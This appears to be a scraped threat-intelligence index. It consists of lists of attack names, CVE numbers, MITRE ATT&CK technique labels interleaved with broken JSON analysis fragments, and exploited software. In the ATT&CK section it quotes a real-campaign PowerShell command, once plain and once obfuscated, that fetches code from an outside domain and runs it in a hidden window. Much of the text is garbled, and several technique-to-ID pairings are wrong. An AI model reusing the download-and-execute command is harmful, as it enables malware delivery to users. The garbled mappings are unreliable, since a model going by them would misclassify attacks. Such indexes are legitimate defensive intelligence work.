PowerShell with Sandbox Evasion ShadowPad with ScatterBrain obfuscation Shahmaran Backdoor Shared Cloud Credentials Exploitation (CVE-2025-20286) Ship Monday Signal Jamming Signal Jamming of Drones Silent Ransom Exploit Silent Ransomware Group (SRG) Tech Support Scam SIM Swapping SIM Swapping for 2FA Bypass SIM Swapping to Bypass SMS-based MFA SimpleHelp flaws chained by DragonForce SimpleHelp Remote Code Execution SimpleHelp RMM Software flaws for initial access Single Bug Root Exploit (Pixel 6 Pro) Sneaky 2FA Snowflake Customer Data Breach Social Engineering Social Engineering (FOMO Exploitation) Social Engineering Attacks and Scams Social Engineering Domain Registrars Social Engineering for Fake Job Applications Social Engineering via Email Social Engineering via Malicious Salesforce App Social Engineering via Phone Calls Social Engineering via Vishing to install malicious Connected App Software Supply Chain Attack Solana Private Key Theft via Monkey Patching SolarWinds Hack Spam Harvesting via Fake Email Addresses Spear-Phishing Spear-Phishing Attacks Targeting Access Tokens SQL Injection SSH Access via compromised public key SSH Backdoor on Port 53282 SSH Backdoor using OpenSSH SSH Backdoor via Trojanized Putty SSH Brute-Force against PumaBot SSH_Credential_Stuffing_and_Brute_Force SSRF and Path Traversal Stack-based Buffer Overflow Leading to Arbitrary Code Execution Static Credential Exploitation Static Credential Vulnerability Exploitation Stockpiling Vulnerabilities by China Stolen Credentials Stolen Credentials Lacking Multi-Factor Authentication Stolen Credit Card Data Leak Stolen Credit Card Data Trafficking Stolen Credit Card Trafficking Stolen Identity Employment Stolen Session Cookie Exploitation Sub-threshold Cyberattacks SuperBlack Ransomware Deployment via Fortinet vulnerabilities Supply Chain Attack Supply Chain Attack (European Medicines Agency) Supply Chain Attack (Phantom Circuit) Supply Chain Attack on Gluestack packages Supply Chain Attack on Polyfill.io Supply Chain Attack via Compromised NPM Package Token Supply Chain Attack via Malicious NPM Packages Supply Chain Attacks Supply Chain Exposure Supply Chain Hardware Implant Supply Chain Security Weakening Suspicious Container Entrypoint with Base64 Encoded Command Swatting Swatting Threat Symbolic Link trick bypasses FortiGate patches Synthetic Identity Fraud using Generative AI System Information Harvesting and Data Exfiltration via SMTP System Misconfiguration Targeted Exploitation of Qualcomm GPU Driver Vulnerabilities Tax Preparation Firm Hacking TBK DVR Command Injection via Malicious POST Request TBK DVR Command Injection via Mirai Tech Support Scam via Social Engineering and Technical Subterfuge Technical Jargon Obfuscation Telegram API Redirection via Malicious RubyGems Telegram API Token Exfiltration via Malicious Ruby Gems Telegram Exfiltration for MFA Bypass TerraStealer v2 Third-Party Compromise Leading to Operational Disruption Third-Party Vendor Data Breach TikTok Internal API Exploitation TOB-AXIOM-13: Under-constrained Scalar Multiplication Circuits TOB-AXIOM-19: Broken assert_equal Function TOB-AXIOM-3: Under-constrained idx_to_indicator Circuit TOB-AXIOMv2-3: Misused debug_assert in range_check Method Toll Fee Scams TOUGHPROGRESS Malware Leveraging Google Calendar for C2 Triada Backdoor Preload Triada Modular Backdoor Trickbot Malware Infection Trickbot Ransomware Deployment Trimble Cityworks flaw exploited by Chinese threat actors Trojan Horse Drone Smuggling Trojanized software distribution TunnelVision Tupolev Data Breach Typosquatting udev persistence Unauthenticated Camera Feed Access via HTTP/RTSP Unauthenticated HMI Access Unauthenticated Path Traversal in Deluge WebUI Unauthorized Access to Personal Cell Phone Unauthorized eSIM Profile Access Unauthorized Network Access and Data Exfiltration Unauthorized Resource Access and Sensitive Data Sharing Unauthorized SaaS Collaboration Unauthorized System and Data Access by AI Agents Unauthorized Tracking via AirTags Uncontrolled Search Path Element Local Privilege Escalation Unencrypted HTTP Data Transmission Unintended Lateral Movement Unpatched Internet-Facing Assets Exploit Unprioritized Critical Vulnerability Exploitation Unprioritized Vulnerability Overload Unrotated Credentials Unsecured Database Unsecured systems/Forgotten Assets Unspecified_Nation-State_Attack_on_ConnectWise Untrusted Code Execution Uploading arbitrary files via crafted HTTPS requests to gain root access USB-based Malware Propagation Use of AVCheck to Test Malware Detection Use of Legitimate Software for Malicious Purposes Use of Proxy IP Infrastructure for Concealing Origin Use of Stolen Social Security Numbers for Identity Theft and Fraud Use-After-Free (UAF) Exploit leading to Arbitrary Kernel Code Execution Use-After-Free Memory Corruption via iMessage Nickname Updates User Reporting Abuse for Surveillance Vanta Customer Data Exposure Various Email-Based Social Engineering Campaigns VBA Macro Execution VBS Script for Silent Installation of NetBird and OpenSSH vBulletin Ad Template Injection vBulletin API and Template Abuse Vendor Email Compromise (VEC) Vibe Coding ViewState Code Injection ViewState Code Injection with Godzilla Framework ViewState Code Injection with Publicly Available Machine Keys Vishing and Social Engineering with AI-generated Voice Vishing attack on Salesforce Data Loader Vishing Attack on Salesforce Users Vishing Campaign Targeting Salesforce Data with Fake Data Loader App Vishing Campaign to Deploy Malicious Data Loader Vishing for MFA Reset and Account Takeover Voice Phishing (Vishing) Volt Typhoon Exploitation of US Critical Infrastructure Volt Typhoon Network Squatting Volt Typhoon targeting US water facilities VPN_Circumvention_of_Age_Verification Weak Passwords Weakened Cryptography Weaponized Hardware Implant via Manipulated Keyboard Weaponized Pirated Software (Sandworm) Weaponizing Dependabot for Confused Deputy Attacks Web Browser Exploitation Web Crawler Exploitation using Spider Honeypots Web Injection via Malicious Browser Extension Web Shell Deployment via Internet-Facing Web Server Flaw Web Shell Upload and Execution Web Shell Upload/Execution Web Skimming Webcam EDR Bypass Whisper Backdoor using compromised Exchange webmail Whitespace Obfuscation Whitespace Trick in Python Backdoors Windows Defender exclusion via PowerShell Wiper Malware via Malicious NPM Packages WooCommerce Site Hijacking via Fake Security Patches XSS in Webmail Servers XZ Utils Backdoor YouTube Channel Email Address Exposure via API Chaining YouTube Partner Program Email Address Disclosure via Access Control Issue Zanubis Zergeca Botnet Zero-day Exploit of ScreenConnect Zero-day Exploits Used by Cellebrite Zero-day in MagicLine4NX supply chain attack Zero-Day Vulnerability Exploitation in Spyware Campaigns ZeroCrumb Zerolot
Vulnerabilities All CVE-2014-2120 CVE-2017-0199 CVE-2017-11882 CVE-2017-7178 CVE-2017-9805 CVE-2018-0802 CVE-2018-13379 CVE-2019-13272 CVE-2020-12812 CVE-2020-14144 CVE-2020-28895 CVE-2020-3259 CVE-2020-35198 CVE-2021-22205 CVE-2021-3156 CVE-2021-32030 CVE-2022-0847 CVE-2022-1040 CVE-2022-3699 CVE-2022-38028 CVE-2022-41040 CVE-2022-41082 CVE-2023-1389 CVE-2023-20109 CVE-2023-20198 CVE-2023-22515 CVE-2023-26083 CVE-2023-27855 CVE-2023-27856 CVE-2023-2917 CVE-2023-34039 CVE-2023-34048 CVE-2023-35082 CVE-2023-38035 CVE-2023-38831 CVE-2023-39780 CVE-2023-40044 CVE-2023-4041 CVE-2023-4058 CVE-2023-46604 CVE-2023-46747 CVE-2023-46748 CVE-2023-48409 CVE-2023-49103 CVE-2023-49606 CVE-2023-4966 CVE-2023-50164 CVE-2023-51467 CVE-2023-6241 CVE-2024-13915 CVE-2024-13916 CVE-2024-13917 CVE-2024-1708 CVE-2024-1709 CVE-2024-21410 CVE-2024-21762 CVE-2024-21894 CVE-2024-23222 CVE-2024-23897 CVE-2024-24691 CVE-2024-27198 CVE-2024-27199 CVE-2024-28991 CVE-2024-28995 CVE-2024-30850 CVE-2024-31839 CVE-2024-35250 CVE-2024-36401 CVE-2024-37085 CVE-2024-3721 CVE-2024-37383 CVE-2024-38475 CVE-2024-38476 CVE-2024-38812 CVE-2024-38814 CVE-2024-40711 CVE-2024-40766 CVE-2024-42009 CVE-2024-43093 CVE-2024-43461 CVE-2024-44243 CVE-2024-45519 CVE-2024-4577 CVE-2024-51378 CVE-2024-51567 CVE-2024-53298 CVE-2024-55591 CVE-2024-56145 CVE-2024-57726 CVE-2024-57727 CVE-2024-57728 CVE-2024-8190 CVE-2024-8963 CVE-2024-9047 CVE-2025-0072 CVE-2025-0285 CVE-2025-0286 CVE-2025-0287 CVE-2025-0288 CVE-2025-0289 CVE-2025-12654 CVE-2025-2011 CVE-2025-20129 CVE-2025-20130 CVE-2025-20163 CVE-2025-20188 CVE-2025-20261 CVE-2025-20286 CVE-2025-21204 CVE-2025-21333 CVE-2025-21479 CVE-2025-21480 CVE-2025-22230 CVE-2025-23006 CVE-2025-23120 CVE-2025-24016 CVE-2025-24071 CVE-2025-2502 CVE-2025-26396 CVE-2025-26443 CVE-2025-26468 CVE-2025-27038 CVE-2025-27363 CVE-2025-2783 CVE-2025-2857 CVE-2025-30183 CVE-2025-30184 CVE-2025-30406 CVE-2025-30507 CVE-2025-30515 CVE-2025-31022 CVE-2025-31324 CVE-2025-31651 CVE-2025-32433 CVE-2025-32756 CVE-2025-37089 CVE-2025-37090 CVE-2025-37091 CVE-2025-37092 CVE-2025-37093 CVE-2025-37094 CVE-2025-37095 CVE-2025-37096 CVE-2025-37099 CVE-2025-3755 CVE-2025-3916 CVE-2025-3935 CVE-2025-41438 CVE-2025-4427 CVE-2025-4428 CVE-2025-4598 CVE-2025-46352 CVE-2025-4664 CVE-2025-48745 CVE-2025-48757 CVE-2025-48827 CVE-2025-48828 CVE-2025-49113 CVE-2025-5036 CVE-2025-5054 CVE-2025-5068 CVE-2025-5419 CVE-2025-5473 CVE-2025-5474 CVE-2025-5480 CVE-2025-5481 CVE-2025-5747 CVE-2025-5748 CVE-2025-5749 CVE-2025-5750 CVE-2025-5751
MITRE ATT&CK TTP All ' occurred in October ' the mechanism of exploiting a vulnerability through a crafted HTML page visited by a user strongly implies this technique." ' which suggests the supply chain attack may not have been successful." } 'leading' European media organization " "ckjg.exe which in turn would download and execute a file called Stub.exe"] "Command and Scripting Interpreter: T1059 "context": "Attackers targeted a third-party IT logistics organization that managed hardware for SentinelOne employees. This targeting suggests a supply chain attack "context": "The article details a close relationship between the American Active Club and the Swedish organization Tvåsaxe "context": "The article explicitly states that a vulnerability (CVE-2025-5419) in Google Chrome is being actively exploited. The vulnerability allows a remote attacker to exploit heap corruption via a crafted HTML page "context": "The attackers exploited known Ivanti vulnerabilities to gain initial access to a European media organization. This demonstrates the technique of exploiting public-facing applications." "context": "The attackers leveraged the victim's execution of the copied PowerShell command via the Windows Run dialog "context": "The attackers used deceptive links on gaming sites and social media to lure victims to fake Booking.com websites. This is a classic phishing technique aiming to trick users into interacting with malicious content." "context": "The attackers used obfuscated PowerShell commands to download and execute malicious files. The use of mixed casing "context": "The fake CAPTCHA website on the malicious site was used to capture the clipboard contents which contained the malicious PowerShell command." "context": "The malicious links "context": "The mention of a 'specially crafted HTML page (website)' that exploits a Chrome vulnerability suggests a drive-by compromise scenario. Users visiting a malicious or compromised website could unknowingly trigger the exploit "context": "The PowerShell command downloads and executes ckjg.exe "context": "The PowerShell script uses Invoke-RestMethod to retrieve data from 'bkngnet.com' "context": "The quote indicates attackers conducted reconnaissance on SentinelOne servers reachable via the Internet. This aligns with the use of remote services to gain access or gather information about a target network." "contradictions": "No contradictory evidence presented. The article consistently highlights the close and supportive relationships between the involved groups." } "contradictions": "None; the article confirms the victim executes a command." } "contradictions": "None. The article clearly describes the use of deceptive links to redirect users to malicious websites." } "contradictions": "None. The article clearly shows the PowerShell command used." } "contradictions": "None. The article details the use of an external domain." } "contradictions": "None. The article explicitly states that the fake CAPTCHA hijacks the clipboard." } "contradictions": "None. The two-stage download is indicative of the technique." } "contradictions": "The article does not provide specific details about how the vulnerabilities were exploited." } "contradictions": "The article doesn't exclude other methods of delivering the malicious HTML page "contradictions": "The article doesn't specify which remote services were used "contradictions": "The article states that 'A thorough investigation into SentinelOne's infrastructure "contradictions": "There is no evidence contradicting the exploitation of a public-facing application." ] "contradictions": "While not explicitly personalized "Drive-by Compromise: T1189 "Exploit Public-Facing Application: T1190 "Exploitation for Client Execution: T1203 "Exploitation of Remote Services: T1210 "External Remote Services: T1133 "independent_analysis": "The attack chain relies on the victim's use of a command interpreter (Windows Run dialog) to launch the malicious PowerShell script "independent_analysis": "The attack on the third-party hardware logistics provider is a clear indication of a supply chain compromise attempt. The intent is likely to gain access to SentinelOne through its trusted relationship with the logistics provider." "independent_analysis": "The attackers are targeting publicly accessible services to perform reconnaissance. This suggests the use of remote service protocols "independent_analysis": "The campaign's use of sponsored ads and its placement on popular platforms indicate a sophisticated phishing operation designed to maximize its reach and effectiveness." "independent_analysis": "The description aligns perfectly with the definition of exploiting a public-facing application. The crafted HTML page serves as the exploit vector "independent_analysis": "The exploitation of known Ivanti cloud vulnerabilities before public disclosure suggests a zero-day exploitation or very rapid exploitation after disclosure. This is a common tactic used to gain initial access to a system." "independent_analysis": "The provided PowerShell command clearly shows the use of PowerShell to download and execute a file from a remote server "independent_analysis": "The staged download process "independent_analysis": "The strong ties between the Active Club "independent_analysis": "The technique is used to inject malicious code into the victim's system. The clipboard is a common vector for this type of attack." "independent_analysis": "The use of `Invoke-RestMethod` to contact an external website to retrieve and execute malicious code demonstrates clear usage of external remote services for malicious activity." "independent_analysis": "The use of sponsored ads suggests an effort to increase visibility and target a broad audience within specific demographics "independent_analysis": "While not explicitly stating 'drive-by compromise "Ingress Tool Transfer: T1105 "Input Capture: T1056 "Many groups felt that terror designation from the US was unjust "Obfuscated Files or Information: T1027 "powershell -NoProfile -WindowStyle Hidden -Command \"$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv\""] "PowerShell: T1059.001 "Prior to Google Chrome version 137.0.7151.68 "SentinelOne remains unclear about whether the perpetrators' focus was solely on the targeted IT logistics organization or if they intended to establish a foothold to extend their reach to downstream organizations as well "Spearphishing Link: T1192 "Supply Chain Compromise: T1195 "The Americans are definitely in bed with NRM when they’re going over to Sweden and participating in the tournament” "This update is crucial since it addresses an actively exploited vulnerability which could allow an attacker to exploit a specially crafted HTML page (website)." "You’re already providing material support and making key connections.”" ] a common tactic for malware delivery." a designated terrorist group. The collaboration on the MMA tournament Access to Data: T1083 Add subtle data exfiltration routines: T1047 allowing the groups to enhance their effectiveness." and hardware assets found no evidence of compromise and NRM and operational capabilities and that brought the Swedish scene together” and the expressed desire for positive relationships between these groups demonstrates a trusted relationship enabling mutual support and potentially the circumvention of sanctions." and variable name manipulation are common obfuscation techniques." Application Layer Protocol: T1071 attackers targeted a third-party organization responsible for managing hardware logistics for SentinelOne employees at the time." attempting to compromise SentinelOne through a related but weaker target." Authentication Bypass: T1555 Back door merge via branch manipulation: T1059 Botnet: T1192 Brute Force: T1110 Brute Force: T1118 but the crafted HTML page implies user would just have to access the webpage." ] clearly indicates a level of trust and cooperation that transcends mere coincidental overlap. This cooperation facilitates the sharing of resources Cloud Accounts: T1078 Cloud Accounts: T1078.004 Code Injection: T1566 Command and Scripting Interpreter: PowerShell: T1059.001 Command and Scripting Interpreter: T1059 Compromise: T1195 Content Injection: T1659 Continuous integration or continuous deployment (CI/CD) configuration tampering: T1562 Credential compromise of automation tokens: T1552 Credential Stuffing: T1078.004 Credential Stuffing: T1110.001 Credential theft from maintainers or reviewers: T1552 Credentials from Password Stores: T1555 Data Encrypted for Impact: T1486 Data Exfiltration: T1021 Data Exfiltration: T1041 Data Leakage: T1027 Deobfuscate/Decode Files or Information: T1140 directly mapping to this technique." DNS Tunneling: T1071.004 Drive-by Compromise: T1189 either standard or custom Email Forwarding Rule: T1114.003 Exfiltration Over C2 Channel: T1041 Exploit Public-Facing Application: T1190 Exploitation for Client Execution: T1203 Exploitation for Impact: T1210 Exploitation for Privilege Escalation: T1068 Exploitation of Remote Services: T1210 External Remote Services: T1133 File and Directory Discovery: T1083 Heap Metadata: T1083 Impair Defenses: T1562 in which the threat actor exploited two now-known Ivanti cloudvulnerabilities—CVE-2024-8963andCVE-2024-8190— as an attack chain a few days before they were publicly discovered." ] in which threat actors targeted SentineOne servers that could be reached via the Internet to conduct 'extensive remote reconnaissance including collaborative events and shared messaging Indicator Removal: T1070 Ingress Tool Transfer: T1105 Inhibit System Recovery: T1490 InIngress Tool Transfer: T1105 Input Capture: T1056 Insider threat from a compromised or malicious contributor: T1078 intelligence Lateral Movement: T1021 Lateral Tool Transfer: T1570 leading to system compromise without their direct interaction beyond visiting the page." making it more targeted than typical phishing." making them more precise than general phishing attempts. The targeting is a key element of spearphishing." meaning the attacker is leveraging a publicly accessible application (Chrome) to execute arbitrary code by sending it malicious input (the HTML page)." Modify Registry: T1112 Modify update mechanisms to include malicious payloads: T1105 Native API: T1106 Non-Application Layer Protocol: T1095 Obfuscate Files or Information: T1027 Obfuscate/Decode Files or Information: T1027 Obfuscate/Decode Files or Information: T1140 Obfuscated Files or Information: T1027 OS Credential Dumping: T1003 Phishing: T1566 PowerShell: T1059.001 Process Injection: T1055 Proxy: T1090 Pull request poisoning through reviewer fatigue: T1566 quote interruption quotes": [ "During that attack quotes": [ "Google has released an update for the Chrome browser to patch an actively exploited flaw." quotes": [ "PurpleHaze also included an attack on an unnamed quotes": [ "The PurpleHaze activity quotes": [ "This update is crucial since it addresses an actively exploited vulnerability which could allow an attacker to exploit a specially crafted HTML page (website)." ] quotes": [ "Tvåsaxe are part of NRM’s network. They want to have a good relationship with all the groups in the environment” quotes": ["$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp;"] quotes": ["Cybercriminals have started a campaign of redirecting links placed on gaming sites and social media—and as sponsored ads—that lead to fake websites posing as Booking.com"] quotes": ["fake CAPTCHA websites hijack your clipboard"] quotes": ["powershell -NoProfile -WindowStyle Hidden -Command \"$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv\"" quotes": ["pOwERsheLl –N\"O\"p\"rO\" /w h -C\"Om\"ManD \"$b\"a\"np = 'b\"kn\"g\"n\"et.com';$r\"k\"v = I\"n\"v\"o\"k\"e-"R"e"stMethod -Uri $ba\"n\"p;I\"nv\"oke\"-\"E\"xp\"r\"es"sion $r\"k\"v\"" quotes": ["The malicious Captcha form tells the user to copy the content of the clipboard into the Windows Run dialog box and execute the instructions from the above command."] relying on the command interpreter to execute the malicious script." Remote Access Trojan: T1555 Remote Services: T1021 Replication Through Removable Media: T1091 Repository or organization takeover: T1078 Scheduled Task/Job: T1053 SentinelLabs cybersecurity researchers wrote in the post." ] Service Stop: T1489 shared media promotion so there's uncertainty about the exact protocol." Social engineering of contributor trust: T1199 software Spearphishing Attachment: T1193 Spearphishing Link: T1192 Stack-based Buffer Overflow: T1210 strongly suggests the use of this technique to bring malicious tools onto the victim's system." Supply Chain Compromise: T1195 Supply chain infiltration via compromised dependencies: T1195 System Information Discovery: T1082 targeting a known vulnerability in the Chrome browser." the latter tactic being a hallmark of Chinese threat actor activity." ] the targeting suggests intent beyond typical random phishing attempts. The lack of specific targeting data reduces confidence slightly." } this vulnerability allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page." ] to interact with the target." ttp": { "items": { "Exploit Public-Facing Application: T1190 ttp": { "items": { "Phishing: T1566 ttp": { "items": { "Remote Services: T1021 ttp": { "items": { "Trusted Relationship: T1199 Tvåsaxe Under-constrained: T1486 Unsecured Credentials: T1552 User Execution: T1204 Valid Accounts: T1078 Weak review policies or bypassed reviews: T1562 were targeted at users of specific platforms (gaming sites and social media) which further downloads and executes Stub.exe. This demonstrates the transfer of malicious tools into the victim's system." which is an external domain. This is a clear example of using an external service for malicious purposes." which is linked to the NRM while not personalized Windows Command Shell: T1059.003 with one malicious file downloading another
Exploited Software All @crypto-exploit (npm) @gluestack-ui/utils @react-native-aria/button @react-native-aria/checkbox @react-native-aria/combobox @react-native-aria/disclosure @react-native-aria/focus @react-native-aria/interactions @react-native-aria/listbox @react-native-aria/menu @react-native-aria/overlay @react-native-aria/overlays @react-native-aria/radio @react-native-aria/separator @react-native-aria/slider @react-native-aria/switch @react-native-aria/tabs @react-native-aria/toggle @react-native-aria/utils /get_creator_channels endpoint 011209 Intercom 23andMe 4t Tray Minimizer a-b27 ABAP accounts.google[.]com/signin/usernamerecovery AcidPour AcidRain Acreed Action1 Active Directory Active! Mail Adodb.Stream Adreno Graphics Processing Unit (GPU) driver Ahold Delhaize USA's grocery stores AI Models trained on leaked passwords AI/LLM coding assistants aliyun-ai-labs-snippets-sdk, ai-labs-snippets-sdk, and aliyun-ai-labs-sdk (PyPI) Amazon and Microsoft cloud services Amazon Prime Video Amazon Web Services (AWS) Android Android 13 Android Applications Android Open Source Project (AOSP) Android Open Source Project (AOSP) devices Android operating system Android OS Android phones Android-based products Android-based streaming devices (Badbox 2.0) Anel Backdoor Antidote Connector AnyDesk Apache ActiveMQ Apache HTTP Server Apache OfBiz Apache OFBiz Apache Struts Apache Struts 2 Apache Struts2 Apache Tomcat APIs Apple iMessage Apple iOS Apple Mail Apple products Apple Safari Apple Safari (version unspecified) Apple TV+ APT41's TOUGHPROGRESS malware Arm Mali GPU ASP.NET ASP.NET (with ViewState enabled) Asus Routers ASUS routers ASUS Routers ASUS routers with AiCloud ASUS RT-AX55 ASUS RT-AX55 devices AsyncRAT Atlassian Confluence Atomic macOS Stealer (AMOS) Autodesk Revit Automated systems used in drug development, diagnostics, and lab operations AVCheck AVG Online Security Awesome Screen Recorder & Screenshot AWS AWS S3 Azure OpenAI Backdoor.AndroidOS.Triada.z BadBox 2 botnet BADBOX 2.0 Banks and Crypto Exchanges Barracuda ESG Bazarloader BazarLoader Beavertail BeyondTrust biatec-avm-gas-station BlackLock Data Leak Site BPFDoor Brave Browser Brawl Stars Broadcom Brocade Fabric OS Browsec VPN Browsec VPN (ID: omghfjlpggmjjaagoclmmobgdodcjboh) Browser Browser extensions Browser Extensions Canonical apport (up to 2.32.0) Cargo Cellebrite's mobile forensic tools Cellebrite's Universal Forensic Extraction Device (UFED) Chaos ransomware Chaos RAT ChatGPT Check Point gateway devices Check Point gateways Chinese-made cameras Chrome Chrome Loader Chrome V8 JavaScript engine Chromium-based browsers (e.g., Chrome) Chromium-based browsers (Microsoft Edge, Brave, Opera, and Vivaldi) Chromium-based browsers (versions unspecified) Cisco Identity Services Engine (ISE) Cisco Integrated Management Controller (IMC) Cisco IOS XE Cisco IOS XE Wireless LAN Controllers (WLCs) Cisco IOS XE WLC Cisco ISE Cisco Nexus Dashboard Fabric Controller (NDFC) Cisco Smart Licensing Utility Citrix Citrix NetScaler Citrix NetScaler ADC/Gateway Claude Cloudflare Turnstile (Impersonated) Coinbase Colorama and Colorizr (PyPI packages) com.pri.applock com.pri.factorytest Compromised Login Credentials (SSH) computer networks management tool ConnectWise ScreenConnect Consilium Safety CS5000 Fire Panel Contec CMS8000 patient monitor Contec's SolarView Compact Conti CoreFoundation (versions prior to iOS 17.0 beta 5) cputil-node Craft CMS Critical Applications Critical Infrastructure Systems Crocodilus Android Banking Trojan Crosshair X CrowdStrike CrushFTP Crypt.guru Cryptor.biz Custom Client-Side Extension DLLs CVE-2023-26083 CVE-2023-39780 CVE-2023-48409 CVE-2024-8963 and CVE-2024-8190 CyberLock CyberLock Ransomware CyberPanel D-Link D-Link devices Danabot DanaBot DEA online portal DeepSeek Defender Control Deluge BitTorrent client Dependabot Development applications (unspecified) DeviceMetadataWizard.exe DIA internal computerized tracking systems Diavol Digital Certificates from Chunghwa Telecom and Netlock Discord Disney+ DNS (Domain Name System) Docker Docker API Docker CLI Docker Engine API DrayTek routers DrayTek Routers Drones DualSafe Password Manager & Digital Vault DualSafe Password Manager & Digital Vault (ID: lgbjhdkjmpgjgcbcdlhkokkckpjmedgc) easyjson Edge Devices Edimax IP cameras Email Client Software (Unspecified) Endpoint administration framework Endpoint Administration Framework Entities exploited by Playcrypt ransomware Entra Entra ID Epsimed MN-120 Equatio – Math Made Digital Erlang/Open Telecom Platform (OTP) SSH ERMAC ESXi ESXi Server European Medicines Agency (Files related to Pfizer and BioNTech’s COVID-19 vaccine) Evilginx Exchange Server 2016 Exchange Server 2019 express-api-sync Facebook Facebook Android App Fastlane plugin (RubyGems) fastlane-plugin-proxy_teleram fastlane-plugin-telegram fastlane-plugin-telegram-proxy FinalDraft Firebase Firefox Firewalls FormBook FortiGate Fortinet Fortinet firewalls Fortinet Fortigate Fortinet FortiOS Fortinet FortiOS and FortiProxy Fortinet FortiOS/FortiProxy Fortinet FortiVoice FortiOS FortiProxy FortiVoice Fortnite Fortra GoAnywhere MFT FreeType Fronius inverters FTP Servers FunkLocker Gemini Generators GhostLocker GhostLocker 2.0 GhostStealer GIMP Gitea GitHub GitHub Gist GitHub repositories GitLab Gladinet CentreStack Gladinet CentreStack/Triofox Glitch Global Positioning System (GPS) signals gluestack-ui/utils Gmail GMP's CCTV System GoFing Google Google Account Google Account Recovery Process Google Android Google Apps Script Google Calendar Google Chrome Google Chromium V8 Google Drive Google username recovery form (deprecated, no-JavaScript version) Google's Looker Studio GOREVERSE family of backdoors GoVision device Halo2 (Axiom's modified version and PSE's Halo2 fork) HashiCorp Consul HashiCorp Nomad HBO Max Hedera Hashgraph network users non-custodial wallets Hedera Hashgraph wallets HermeticWiper Hewlett Packard Enterprise Insight Remote Support Hewlett Packard Enterprise StoreOnce VSA Hitachi Energy Relion 670, 650 series and SAM600-IO Product HMI (Human-Machine Interfaces) in Water and Wastewater Systems HMRC online tax record accounts Home Depot shopping cart Hook Android banking trojan Hosting company customer accounts Hotel Booking Systems HPE StoreOnce HTTP-based cameras Huawei HG532 router IBM Cloud Pak for Security IBM QRadar IcedID IIS imad213 iMessage iMessage (imagent) Impacket Industrial Control System (ICS) protocols (e.g., Modbus) Instagram Instagram Android App Integrated Dell Remote Access Controller (iDRAC) Interlock ransomware Interlock Ransomware Internet Archive Internet Explorer Internet Information Services (IIS) InvisibleFerret iOS iOS 18.5 iOS imagent process iOS Kernel (versions 14 & 15) iOS versions up to 18.1.1 IP cameras and DVRs iPhone IPRoyal Ivanti Ivanti bugs CVE-2024-8963 and CVE-2024-8190 Ivanti Cloud Service Appliances Ivanti Connect Secure Ivanti Connect Secure, Policy Secure and ZTA Gateways Ivanti EPMM Ivanti EPMM (MobileIron Core) JetBrains JetBrains TeamCity Jira Juniper Routers KillSecurity 2.0 KillSecurity 3.0 ks.sys driver Kubernetes Kyivstar Langflow Large Language Models (LLMs) Large Language Models (LLMs) and AI Integrations Law Enforcement Database (US Drug Enforcement Agency (DEA)) Lee Enterprises Network Legacy Billing Service Legacy Detection Systems Legacy Driver (Vulnerable) Lenovo Diagnostics Driver lfwfinance/sdk lfwfinance/sdk-dev libmalloc (versions prior to iOS 17) LinkedIn Linux Linux Kernel Linux Kernel (Dirty Pipe) Linux Kernel (Unspecified Version) LiteSpeed Cache LiteSpeed Cache WordPress plugin LLM-generated code Lobshot LockBit 3.0 Looker Studio Lovable Apps Low-end laptops Lucky_Gh0$t Lucky_Gh0$t (Yashma ransomware variant) Lumma Lumma infostealer Lumma Infostealer Lumma Stealer Lumma Stealer (LummaC2) LummaC2 macOS Mali Driver (Kernel Component) Mali GPU Driver Marks & Spencer Online Ordering System MDaemon Email Server MeinVodafone Merck (NotPetya malware) MeshCentral Agent Meshtastic Network Meta infostealer Metasploit Meteobridge (version 6.2) Microsoft Microsoft 365 Microsoft Active Directory Microsoft Azure Microsoft Cloud Services Microsoft Edge Microsoft Editor – Spelling & Grammar Checker Microsoft Entra ID Microsoft Equation Editor Microsoft Exchange Microsoft Exchange Server Microsoft IIS Microsoft KMS activators Microsoft Office Microsoft Office (CVE-2017-11882) Microsoft Office 365 Microsoft Power Pages Microsoft Software Microsoft SQL Server Microsoft Teams Microsoft Windows Microsoft.XMLHTTP Minecraft Mitsubishi Electric MELSEC iQ-F Series Mobile Applications (Wealth Management) Mobile Apps (Government-Developed and Third-Party) Mobile Devices Moneybox Bespoke Investment Platform (Sycamore) Mozilla Firefox MSN Homepage, Bing Search & News MSN New Tab MSN New Tab (ID: lklfbkdigihjaaeamncibechhgalldgl) Multiple Cisco Small Business RV Series Routers MyGov.be NASA's open source software NetBird Netflix NetSupport Manager NetSupport RAT Network Gear NGate Node.js NodeSnake NodeSnake RAT NoodleRAT NotPetya NPM packages NPM Packages Disguised as Express Utilities NTFS Filesystem Numero Numero Malware Nvidia CUDA Toolkit OAuth Apps Okta Old plugins, CMS versions or themes Online Security & Privacy extension Open Source Projects on Github Open WebUI OpenSSH OpenSSL Operating System OT systems OtterCookie OttoKit WordPress plugin Outdated software in Biotech Outlook Outlook 2016 Output Messenger Packit Stealer Palo Alto Networks Expedition Palo Alto Networks PAN-OS Palo Alto PAN-OS pancake_uniswap_validators_utils_snipe, pancakeswap-oracle-prediction, ethereum-smart-contract, env-process (npm) Paragon Partition Manager passwd PathWiper PayDay Loader PayU CommercePro plugin for WordPress PCs PDQ Connect Agent Peet's Coffee app Phishing Emails phones used by national security officials PHP PI Rank PI Rank (ID: ccgdboldgdlngcgfdolahmiilojmfndl) PlayStation PlayStation Network Podman Polyfill Polyfill.io poppo213 Power Pages PowerSchool Powershell PowerShell Premium WordPress 'Motors' theme PrimeCache (IIS Module) Progress Telerik Report Server PureCrypter PureLogs Stealer Putty Pygmy Goat PyPI packages (Python script stealer) PyPI packages (Solana key stealer) PyPI packages typosquatting colorama and colorizr PyTorch models (PyPI) Qakbot Qualcomm Qualcomm Adreno GPU driver Qualcomm Adreno GPU drivers Qualcomm chipsets Qualcomm components Qualcomm products Raccoon Ralord Ransomware rand-user-agent Ransomware Rapid SCADA Raspberry Pi Zero W Raw PC Darts RawGAT-ST RawNet2 RDP RDP (Windows) React Native Aria Packages react-native-aria packages Realtek SDK Redline RedLine RedLine infostealer RedLine Malware regsvr32.exe Remcos Ring app RoamingMOUSE Robbinhood ransomware Roblox Roundcube Roundcube webmail Roundcube Webmail RoundCube Webmail RTSP cameras RuntimeBroker.exe Ryuk SaaS Accounts Sakura RAT Salesforce Salesforce Data Loader Salesforce Platform Samsung MagicINFO 9 Server Sante DICOM Viewer Pro SAP ERP SAP NetWeaver SAP NetWeaver Visual Composer SAP SuccessFactors Satellites in Low Earth 